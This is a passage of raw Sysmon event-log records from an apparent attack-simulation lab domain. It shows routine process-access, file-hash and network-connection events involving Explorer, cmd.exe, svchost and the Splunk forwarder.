07:51:55.050{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.033{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F49A-60EB-327D-00000000CF01}6188C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.033{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F49A-60EB-327D-00000000CF01}6188C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001048774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.678{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51017-false10.0.1.12-8000- 10341000x80000000000000001048773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.018{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+105f4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.003{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.003{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:56.968{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:56.869{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D59BF9ED7B7C4C0C9B9539D038A37C2,SHA256=CA8578E4A6548C5C68AA9AFC6F23FE964EFB55539FCDA63A29D38FA9C06E0257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807501Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:56.276{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=571A4A3D0E6B0379828F9ED51E02749E,SHA256=A6BFE5321D8A95DD9912D14A422074C8A99979E6904E2BA17D097696A8B562C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:57.899{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A7734344EC87F44C9C2C8A1F1A8616A,SHA256=6CDD27BD15049729CD815907955203C7BE5411BB6783258A404394C066D5FD5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807502Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:57.276{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4FB04FE4E658C416367F9793EAFED7A,SHA256=84A230688B2B3714868FFFE070E95CB4C77C26A4BC2329E0687F7AE7B56E043F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:58.929{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0609A3DE334A7AFA6128EBE90BE1311,SHA256=CFC63BA5EF5394AA544344811E9DD2222161E02A167183F34438D7611825BC7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807503Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:58.276{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=291F40FF7FCE69FE0D5D89A8B00CC0A1,SHA256=C58D44F35D1EDA8BA2358820DE0A8399B0B260FCFBE9DD496499D66B86D67014,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.491{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51018-false10.0.1.12-8089- 23542300x80000000000000001048845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.948{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE7FF0EF0C0237ECC32E18168822D32A,SHA256=7D1AD210594D3EEC7FAEB8E520B612B571D3315C9EA1E003ED65ED0E7CDF6DC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807504Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:59.276{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=166424C525B26E8E0ECB797579B4E4A3,SHA256=C2DB54D3C1ADD651D81DF8F1A6E031AA22BB778775E39DFE4639D52495A0571F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.712{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64C12F212C53A965A41605530F9276A6,SHA256=6FAAA911B586C129E8A65E32B1E0DD013C8ABDC32520BB1FA9CCC1AE392F3983,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 